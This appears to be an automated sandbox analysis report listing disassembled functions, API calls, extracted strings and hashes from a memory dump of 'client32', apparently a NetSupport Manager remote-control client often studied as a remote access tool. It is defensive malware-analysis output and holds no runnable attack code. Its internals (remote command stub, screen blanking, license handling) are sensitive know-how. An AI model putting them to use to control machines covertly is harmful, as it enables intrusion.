API String ID: 1365068426-0
Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76

Function 110A9240 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770

Function 1107F520 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf64cc2ecc299d878a875b0b3ad39c71f20e3bd71b788c44897adbd9b6c2b94
Instruction ID: 72d462e1878a5452cad5d94817b9b80e58340672192053230a5e56b655e0bcdd
Opcode Fuzzy Hash: 9bf64cc2ecc299d878a875b0b3ad39c71f20e3bd71b788c44897adbd9b6c2b94
Instruction Fuzzy Hash: 0811FA7A3B092607A70C44399C73AF922C1835435AB84573DBA97CD6C2EA5DA4599608

Function 1102B546 Relevance: 70.5, APIs: 7, Strings: 33, Instructions: 485COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1102B5F5
GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658

Strings

609290, xrefs: 1102B5DD
*** Set eval flags registy, key [%s], xrefs: 1102BABA
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B9DA, 1102BA38, 1102BAA4, 1102BB1C
ReplaceLicFile : New checksum and disk checksum don't match so we write file, xrefs: 1102B546
_License, xrefs: 1102B881, 1102B8BA, 1102B972, 1102BA18
*** product before copy %d, xrefs: 1102B88C
Product, xrefs: 1102B87C, 1102B8B5
ReplaceLicFile : Status after renames %d - error %d, xrefs: 1102B7FF
%snsm.%s.%02d.lic, xrefs: 1102B5EF
Portable Tech Console\nsm.lic, xrefs: 1102BBDE
*** Copied and read new license file, xrefs: 1102B84B
ReplaceLicFile : Revert to previous license, xrefs: 1102B945
IsA(), xrefs: 1102B9DF, 1102BA3D, 1102BAA9, 1102BB21
ReplaceLicFile : bWriteFile = %d, LoadLicense = %d, xrefs: 1102B5A9
*** Activate new license file in registy, key [%s], xrefs: 1102B9F0
*** product after copy %d, xrefs: 1102B8C5
ReplaceLicFile : Status after config test %d - lic error %d, xrefs: 1102B759
ReplaceLicFile : Rename current license file to %s, xrefs: 1102B636
HasEval, xrefs: 1102BB32
Portable Tutor\nsm.lic, xrefs: 1102BBA3
*** Copy enforce section for config %x, xrefs: 1102B85B
ReplaceLicFile : Written file %s, read into temporary config, xrefs: 1102B6C7
nsm, xrefs: 1102B64C
ReplaceLicFile : Load new license file, xrefs: 1102B819
ReplaceLicFile : Read license file, xrefs: 1102B5BE
V12.10.4, xrefs: 1102BAED, 1102BB31
ReplaceLicFile : License error %d reading %s, xrefs: 1102B8E5
z:, xrefs: 1102B991
product, xrefs: 1102B96D
ReplaceLicFile : flags & 2 - just reread the license details, xrefs: 1102B587
_checksum, xrefs: 1102BA13
*** Set eval flags failed, error [%d], xrefs: 1102BB4B
ReplaceLicFile : Attempt to rename %s to %s, xrefs: 1102B77C, 1102B7B0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileNameTempwsprintf
String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$609290$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : Attempt to rename %s to %s$ReplaceLicFile : License error %d reading %s$ReplaceLicFile : Load new license file$ReplaceLicFile : New checksum and disk checksum don't match so we write file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : Revert to previous license$ReplaceLicFile : Status after config test %d - lic error %d$ReplaceLicFile : Status after renames %d - error %d$ReplaceLicFile : Written file %s, read into temporary config$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
API String ID: 2029944419-2998995138
Opcode ID: 174ab10ef622b4b4a599600fe98865488f638ae1b667fd0395751504558a5437
Instruction ID: ea34cc8c2541377923297bd1bd1432500824a42ecbb912290de042532a9e56a7
Opcode Fuzzy Hash: 174ab10ef622b4b4a599600fe98865488f638ae1b667fd0395751504558a5437
Instruction Fuzzy Hash: 14020575E0062A6BDB20DBA4CC40FEEF379AF84708F5441D5E919A7181EB716B84CFA1

Function 1102B56B Relevance: 56.4, APIs: 5, Strings: 27, Instructions: 352COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1102B5F5
GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658

Strings

609290, xrefs: 1102B5DD
*** Set eval flags registy, key [%s], xrefs: 1102BABA
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B9DA, 1102BA38, 1102BAA4, 1102BB1C
_License, xrefs: 1102B881, 1102B8BA, 1102B972, 1102BA18
*** product before copy %d, xrefs: 1102B88C
Product, xrefs: 1102B87C, 1102B8B5
%snsm.%s.%02d.lic, xrefs: 1102B5EF
Portable Tech Console\nsm.lic, xrefs: 1102BBDE
*** Copied and read new license file, xrefs: 1102B84B
IsA(), xrefs: 1102B9DF, 1102BA3D, 1102BAA9, 1102BB21
ReplaceLicFile : bWriteFile = %d, LoadLicense = %d, xrefs: 1102B5A9
*** Activate new license file in registy, key [%s], xrefs: 1102B9F0
*** product after copy %d, xrefs: 1102B8C5
ReplaceLicFile : Rename current license file to %s, xrefs: 1102B636
HasEval, xrefs: 1102BB32
*** Copy enforce section for config %x, xrefs: 1102B85B
Portable Tutor\nsm.lic, xrefs: 1102BBA3
nsm, xrefs: 1102B64C
ReplaceLicFile : Load new license file, xrefs: 1102B819
ReplaceLicFile : Read license file, xrefs: 1102B5BE
V12.10.4, xrefs: 1102BAED, 1102BB31
z:, xrefs: 1102B991
product, xrefs: 1102B96D
ReplaceLicFile : flags & 2 - just reread the license details, xrefs: 1102B587
_checksum, xrefs: 1102BA13
*** Set eval flags failed, error [%d], xrefs: 1102BB4B
ReplaceLicFile : File checksum matches new checksum so don't write file but load, xrefs: 1102B56B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileNameTempwsprintf
String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$609290$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : File checksum matches new checksum so don't write file but load$ReplaceLicFile : Load new license file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
API String ID: 2029944419-3947553885
Opcode ID: 56bb1cfb618b80d56de75f6d6c36360757d97bcfb224a5606af07d0a30c758e5
Instruction ID: 6903609fa05968b79cc99ebba03b166313860aa57c38e94e7175ce74c4acfd72
Opcode Fuzzy Hash: 56bb1cfb618b80d56de75f6d6c36360757d97bcfb224a5606af07d0a30c758e5
Instruction Fuzzy Hash: 6BC12575E0062A5BEB20DB64CC40FEEF779AF80708F5441D5E91977181EB716A84CFA2

Function 11053720 Relevance: 49.3, APIs: 11, Strings: 17, Instructions: 348COMMON

Download Yara Rule

Strings

%sremcmdstub.exe, xrefs: 110539B4
UserAcknowledge, xrefs: 1105384B
EnableSmartcardAuth, xrefs: 110539FF
_License, xrefs: 110537E3
_debug, xrefs: 11053569
MinimumEncryption, xrefs: 11053B59
platformid, xrefs: 11053564
Usernames, xrefs: 1105388B
Client, xrefs: 11053850, 11053890, 110538EA, 11053901, 11053928, 11053999, 110539E6, 11053A04, 11053A64, 11053AAE, 11053B5E
Inactivity, xrefs: 11053923
DisableInventory, xrefs: 11053A5F, 11053AA9
UseNTSecurity, xrefs: 110538FC
DEMO, xrefs: 11053803
DisableRemoteCmd, xrefs: 11053994, 110539E1
%spciinv.dll, xrefs: 11053A7F
Password, xrefs: 110538E5
serial_no, xrefs: 110537DE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: %spciinv.dll$%sremcmdstub.exe$Client$DEMO$DisableInventory$DisableRemoteCmd$EnableSmartcardAuth$Inactivity$MinimumEncryption$Password$UseNTSecurity$UserAcknowledge$Usernames$_License$_debug$platformid$serial_no
API String ID: 0-1779888543
Opcode ID: e16a8755776086d36e1b31847ec66cab136d5ab0f4874b86e8c28349ff3edf32
Instruction ID: 5762d973d5433722e04aa92932485fba5c9e567f96aab9c52d96a157c048a66c
Opcode Fuzzy Hash: e16a8755776086d36e1b31847ec66cab136d5ab0f4874b86e8c28349ff3edf32
Instruction Fuzzy Hash: 3AD1D674F053199BEB91CF65CC40FEEB7B5AF45704F0044D9E519AB280EB70A984CB55

Function 110496B0 Relevance: 49.2, APIs: 6, Strings: 22, Instructions: 195COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 11049730
__itow.LIBCMT ref: 1104978D
wsprintfA.USER32 ref: 11049819
_sprintf.LIBCMT ref: 110498C5
_free.LIBCMT ref: 110498D1
_sprintf.LIBCMT ref: 11049904

Strings

,%dK, xrefs: 110498E7
STATE, xrefs: 110497D9
INFO, xrefs: 11049769, 110497D2
,%.*s, xrefs: 110498BF
%s %s, xrefs: 1104995C
,%x, xrefs: 110498F1
BLOCK, xrefs: 110497E0
REGISTER, xrefs: 110497EE
DATA_OVERWRITE, xrefs: 1104977E
TC_FILTER, xrefs: 11049770
DATA, xrefs: 11049762
ACTIVATE, xrefs: 110497B6
%s PLUGIN_%s CMD_%s %hs, xrefs: 1104980D
TC_LIST, xrefs: 11049777
INIT, xrefs: 1104974D, 110497C4
EXECUTE, xrefs: 11049754
UNREGISTER, xrefs: 110497F5
CLOSE, xrefs: 1104975B, 110497AF
POLL, xrefs: 110497CB
RESEND, xrefs: 110497E7
CHANGE, xrefs: 110497BD
START, xrefs: 110497A8

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __itow_sprintf$_freewsprintf
String ID: %s %s$%s PLUGIN_%s CMD_%s %hs$,%.*s$,%dK$,%x$ACTIVATE$BLOCK$CHANGE$CLOSE$DATA$DATA_OVERWRITE$EXECUTE$INFO$INIT$POLL$REGISTER$RESEND$START$STATE$TC_FILTER$TC_LIST$UNREGISTER
API String ID: 3257145489-1307768689
Opcode ID: 097a17a3697500aec042dd817b181a7e952e8df86b1f80b45c54c30784a7b934
Instruction ID: 930f0cabece7cb9d3997530a20ae048ed265a9589c24b55cee6a0a6737571226
Opcode Fuzzy Hash: 097a17a3697500aec042dd817b181a7e952e8df86b1f80b45c54c30784a7b934
Instruction Fuzzy Hash: 0B71D579D082699BEB15CF58D8C069DB3B8FB49304F5080FAD955A7604FB325F498B81

Function 11139060 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 229registrylibraryloaderCOMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
GetStockObject.GDI32(00000004), ref: 111390C5
RegisterClassA.USER32(?), ref: 111390D9
GetLastError.KERNEL32 ref: 1113914F
GetLastError.KERNEL32 ref: 1113916B
CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
UpdateWindow.USER32(?), ref: 1113929B
GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322

Strings

m_hWnd, xrefs: 1113921B, 11139250, 1113928A, 111392E0
BlankWnd x%x created, w=%d, h=%d, xrefs: 111391E9
_debug, xrefs: 111390FF, 1113911C
Error. RegisterClass(%s) failed, e=%d, xrefs: 11139172
Error. BlankWnd not created, e=%d, xrefs: 11139329
Error setting blankwnd timer, e=%d, xrefs: 1113930B
BlankHeight, xrefs: 1113910B
BlankWidth, xrefs: 111390FA
NSMBlankWnd, xrefs: 111390D2, 1113915B, 11139171, 111391CB
Info. Class %s already registered, xrefs: 1113915C
Blank, xrefs: 111391C6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11139216, 1113924B, 11139285, 111392DB
DwmEnableComposition, xrefs: 111392B0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1116282658-3566152235
Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55

Function 110433B0 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 327windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457

ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
_memset.LIBCMT ref: 11043445
_strncpy.LIBCMT ref: 11043473
wsprintfA.USER32 ref: 11043558
_strncpy.LIBCMT ref: 110435A1
_strncpy.LIBCMT ref: 110435D5
SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
BringWindowToTop.USER32(?), ref: 110436CA
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8

Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E

MessageBeep.USER32(000000FF), ref: 11043705

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetDlgItem.USER32(?,00000002), ref: 1104372A
SetFocus.USER32(00000000), ref: 11043731

Strings

m_hWnd, xrefs: 1104365C
AckDlgTimeOut, xrefs: 1104362D
*UserAckRejectDefault, xrefs: 1104370F
*UserAckRejectWording, xrefs: 11043607
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11043657
*UserAckWording, xrefs: 110434B4
Client, xrefs: 110434E3, 11043632
AckDlgDisplayText, xrefs: 110434DE
helpdesk.ico, xrefs: 110433DC

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
